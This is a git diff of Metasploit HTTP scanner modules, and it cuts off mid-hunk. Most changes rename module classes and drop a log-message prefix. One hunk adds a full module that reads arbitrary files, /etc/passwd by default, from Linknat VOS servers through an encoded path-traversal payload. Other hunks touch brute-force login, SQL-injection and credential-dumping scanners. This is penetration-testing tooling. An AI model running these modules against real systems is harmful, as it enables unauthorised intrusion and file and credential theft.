a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb index 293613c0c2..9a63b5f10e 100644 --- a/modules/auxiliary/scanner/http/infovista_enum.rb +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/ipboard_login.rb b/modules/auxiliary/scanner/http/ipboard_login.rb index 2e32e763ef..6fe82fc2bc 100644 --- a/modules/auxiliary/scanner/http/ipboard_login.rb +++ b/modules/auxiliary/scanner/http/ipboard_login.rb @@ -3,7 +3,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/ipboard' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jboss_status.rb b/modules/auxiliary/scanner/http/jboss_status.rb index 871adfedaa..e4e06b48c5 100644 --- a/modules/auxiliary/scanner/http/jboss_status.rb +++ b/modules/auxiliary/scanner/http/jboss_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index 7c6e5758ab..5f58b1af05 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jenkins_command.rb b/modules/auxiliary/scanner/http/jenkins_command.rb index 87c640e6be..92a1b8f735 100644 --- a/modules/auxiliary/scanner/http/jenkins_command.rb +++ b/modules/auxiliary/scanner/http/jenkins_command.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'cgi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 22318191ab..bb2ad6616b 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -11,7 +11,7 @@ require 'rex/proto/http' require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -43,17 +43,17 @@ class Metasploit3 < Msf::Auxiliary }) unless res - vprint_error("#{peer} - No response received") + vprint_error("No response received") return end unless res.headers.include?('X-Jenkins') - vprint_error("#{peer} - responded with #{res.code} but does not seem to be Jenkins") + vprint_error("responded with #{res.code} but does not seem to be Jenkins") return end version = res.headers['X-Jenkins'] - print_status("#{peer} - Jenkins Version - #{version}") + print_status("Jenkins Version - #{version}") report_service( :host => rhost, :port => rport, @@ -91,13 +91,13 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain', }) unless res - vprint_error("#{peer} - Timeout") + vprint_error("Timeout") return end case res.code when 200 - print_good("#{peer} - #{uri_path} does not require authentication (200)") + print_good("#{uri_path} does not require authentication (200)") report_note({ :type => "jenkins_path", :host => rhost, @@ -120,22 +120,22 @@ class Metasploit3 < Msf::Auxiliary ) end when 403 - print_status("#{peer} - #{uri_path} restricted (403)") + print_status("#{uri_path} restricted (403)") when 401 - print_status("#{peer} - #{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}") + print_status("#{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}") when 404 - print_status("#{peer} - #{uri_path} not found (404)") + print_status("#{uri_path} not found (404)") when 301 - print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") + print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") when 302 - print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") + print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") else - print_status("#{peer} - #{uri_path} Don't know how to handle response code #{res.code}") + print_status("#{uri_path} Don't know how to handle response code #{res.code}") end end def parse_system_info(body) - vprint_status("#{peer} - Getting useful information from systemInfo") + vprint_status("Getting useful information from systemInfo") infos = { "os.name" => nil, "os.version" => nil, diff --git a/modules/auxiliary/scanner/http/jenkins_login.rb b/modules/auxiliary/scanner/http/jenkins_login.rb index 66bd139aa9..08e6c34881 100644 --- a/modules/auxiliary/scanner/http/jenkins_login.rb +++ b/modules/auxiliary/scanner/http/jenkins_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/jenkins' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb index 0b355c0e4f..3e5d3b02da 100644 --- a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb +++ b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb index 811261b7cc..79ee38026a 100644 --- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -68,14 +68,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)") + print_good("Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb index 2ae1d62bb8..4e959d20a6 100644 --- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -41,7 +41,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), @@ -85,14 +85,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!") + print_good("Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb index da0562c0b6..f281195326 100644 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary 'htaccess.txt' ] - vprint_status("#{peer} - Checking for interesting pages") + vprint_status("Checking for interesting pages") pages.each do |page| scan_pages(tpath, page, ip) end @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary note = "Registration Page" end - print_good("#{peer} - #{note}: #{tpath}#{page}") + print_good("#{note}: #{tpath}#{page}") report_note( :host => ip, @@ -90,13 +90,13 @@ class Metasploit3 < Msf::Auxiliary return rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb index a199aef541..16bb6ec313 100644 --- a/modules/auxiliary/scanner/http/joomla_plugins.rb +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary tpath += '/' end - vprint_status("#{peer} - Checking for interesting plugins") + vprint_status("Checking for interesting plugins") res = send_request_cgi({ 'uri' => tpath, 'method' => 'GET' @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary nsize = res.body.size if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("#{peer} - Plugin: #{tpath}#{papp} ") + print_good("Plugin: #{tpath}#{papp} ") report_note( :host => ip, :port => rport, @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary ) if (papp =~/passwd/ and res.body =~/root/) - print_good("#{peer} - Vulnerability: Potential LFI") + print_good("Vulnerability: Potential LFI") report_web_vuln( :host => ip, :port => rport, @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary :name => 'Local File Inclusion' ) elsif (res.body =~/SQL syntax/) - print_good("#{peer} - Vulnerability: Potential SQL Injection") + print_good("Vulnerability: Potential SQL Injection") report_web_vuln( :host => ip, :port => rport, @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary :name => 'SQL Injection' ) elsif (papp =~/>alert/ and res.body =~/>alert/) - print_good("#{peer} - Vulnerability: Potential XSS") + print_good("Vulnerability: Potential XSS") report_web_vuln( :host => ip, :port => rport, @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) if (res1.code == 200) - print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") + print_good("Page: #{tpath}index.php?option=com_#{pages}") report_note( :host => ip, :port => datastore['RPORT'], @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) else - vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + vprint_error("Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") end end elsif (res.code == 403) @@ -156,13 +156,13 @@ class Metasploit3 < Msf::Auxiliary return rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb index 3e280c8ad8..c167a2a28c 100644 --- a/modules/auxiliary/scanner/http/joomla_version.rb +++ b/modules/auxiliary/scanner/http/joomla_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Joomla include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb new file mode 100644 index 0000000000..63e5630128 --- /dev/null +++ b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linknat Vos Manager Traversal', + 'Description' => %q( + This module attempts to test whether a file traversal vulnerability + is present in version of linknat vos2009/vos3000 + ), + 'References' => [ + ['URL', 'http://www.linknat.com/'], + ['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0145458'] + ], + 'Author' => ['Nixawk'], + 'License' => MSF_LICENSE)) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']), + OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), + OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5]) + ], self.class) + end + + def vos_uri(path) + full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}" + end + + def vos_version + case target_uri.to_s + when /chs/i + js_uri = vos_uri('js/lang_zh_cn.js') + when /cht/i + js_uri = vos_uri('js/lang_zh_tw.js') + when /eng/i + js_uri = vos_uri('js/lang_en_us.js') + else + print_warning("#{full_uri} - Please identify VOS version manually") + return + end + + res = send_request_cgi('uri' => js_uri) + return unless res + + vprint_status("#{js_uri} - HTTP/#{res.proto} #{res.code} #{res.message}") + + return unless res.code == 200 + res.body =~ /s\[8\] = \"([^"]*)\"/m ? major = $1 : major = nil + res.body =~ /s\[169\] = \"[^:]*: ([^"\\]*)\"/m ? minor = $1 : minor = nil + "#{major} #{minor}" + end + + def run_host(ip) + version = vos_version + unless version + print_error("#{full_uri} - Failed to identify Linknat VOS") + return + end + + traversal = '/%c0%ae%c0%ae' * datastore['TRAVERSAL_DEPTH'] + filename = datastore['FILEPATH'] + + uri = normalize_uri(target_uri.path, '..', traversal, filename) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri + ) + + if res && res.code == 200 + path = store_loot( + version, + 'text/plain', + ip, + res.body, + filename) + print_good("#{full_uri} - File saved in: #{path}") + else + print_error("#{full_uri} - Nothing was downloaded") + end + end +end diff --git a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb index 4b232b66dc..1cab8ba1ef 100644 --- a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb +++ b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb index bae0916994..fb0bbcdccd 100644 --- a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 8e65e4407c..a558d21ec3 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb index 87668dd476..56f51d3877 100644 --- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb index 69fe63fff8..8623f79753 100644 --- a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb +++ b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/manageengine_desktop_central' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb index 2204a9ecda..3596a665a0 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb index 9748b7f676..2dd58d4e3f 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient @@ -48,17 +48,17 @@ class Metasploit3 < Msf::Auxiliary def get_users users = nil - vprint_status("#{peer} - Reading users from master...") + vprint_status("Reading users from master...") res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'ReadUsersFromMasterServlet')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 404 - vprint_error("#{peer} - Could not find 'ReadUsersFromMasterServlet'") + vprint_error("Could not find 'ReadUsersFromMasterServlet'") elsif res.code == 200 && res.body =~ /<discoverydata>(.+)<\/discoverydata>/ users = res.body.scan(/<discoverydata>(.*?)<\/discoverydata>/) - vprint_good("#{peer} - Found #{users.length} users") + vprint_good("Found #{users.length} users") else - vprint_error("#{peer} - Could not find any users") + vprint_error("Could not find any users") end users end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary ] ) - vprint_status("#{peer} - Parsing user data...") + vprint_status("Parsing user data...") users.each do |user| record = parse_user_data(user.to_s) next if record.join.empty? @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary cred_table << [user, pass, hash, role, mail, salt] if pass - print_status("#{peer} - Found weak credentials (#{user}:#{pass})") + print_status("Found weak credentials (#{user}:#{pass})") credential_data = { origin_type: :service, module_fullname: self.fullname, diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index 8774079b5d..5f44f9f3c9 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" fname = datastore['FILE'] - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 500 and res.body =~ /Error report/ - print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") + print_error("Cannot obtain '#{fname}', here are some possible reasons:") print_error("\t1. File does not exist.") print_error("\t2. The server does not have any patches deployed.") print_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -80,10 +80,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") else - print_error("#{peer} - Fail to obtain file for some unknown reason") + print_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb index 6724111d4e..a23e7ede47 100644 --- a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb +++ b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb index 0c403db076..4a15cd0776 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb index 8fc76e5fe0..691c59099e 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 8f60998e85..110daab153 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb index a0a33b9188..ef0ddc1d8d 100644 --- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb +++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -132,17 +132,17 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw('uri' => uri) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return file_size end if res.code == 404 - vprint_error("#{peer} - You got a 404. URI must be a valid resource.") + vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.headers['Content-Length'].to_i - vprint_status("#{peer} - File length: #{file_size} bytes") + vprint_status("File length: #{file_size} bytes") return file_size }.call diff --git a/modules/auxiliary/scanner/http/mybook_live_login.rb b/modules/auxiliary/scanner/http/mybook_live_login.rb index caeca141c7..10a8ce6b42 100644 --- a/modules/auxiliary/scanner/http/mybook_live_login.rb +++ b/modules/auxiliary/scanner/http/mybook_live_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mybook_live' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/netdecision_traversal.rb b/modules/auxiliary/scanner/http/netdecision_traversal.rb index 0d6064563a..d4fd40dbbc 100644 --- a/modules/auxiliary/scanner/http/netdecision_traversal.rb +++ b/modules/auxiliary/scanner/http/netdecision_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 6644b0b7d4..f6d645fbb2 100644 --- a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ - print_good("#{peer} - Request may have succeeded on file #{file}") + print_good("Request may have succeeded on file #{file}") report_web_vuln({ :host => rhost, :port => rport, @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Auxiliary }) loot = store_loot("lfi.data","text/plain", rhost, res.body, file) - vprint_good("#{peer} - File #{file} downloaded to: #{loot}") + vprint_good("File #{file} downloaded to: #{loot}") elsif res and res.code - vprint_error("#{peer} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + vprint_error("Attempt returned HTTP error #{res.code} when trying to access #{file}") end end @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary user = datastore['USERNAME'] pass = datastore['PASSWORD'] - vprint_status("#{peer} - Trying to login with #{user} / #{pass}") + vprint_status("Trying to login with #{user} / #{pass}") # test login begin @@ -100,14 +100,14 @@ class Metasploit3 < Msf::Auxiliary return :abort if (res.code == 404) if [200, 301, 302].include?(res.code) - vprint_good("#{peer} - Successful login #{user}/#{pass}") + vprint_good("Successful login #{user}/#{pass}") else - vprint_error("#{peer} - No successful login possible with #{user}/#{pass}") + vprint_error("No successful login possible with #{user}/#{pass}") return :abort end rescue ::Rex::ConnectionError - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return :abort end diff --git a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb index b49e3e4137..f75163ba05 100644 --- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb index bc2663f8f3..9b3dd3137e 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") res = send_request_cgi( { @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary loot = $1 f = ::File.basename(datastore['RFILE']) path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file contents") + 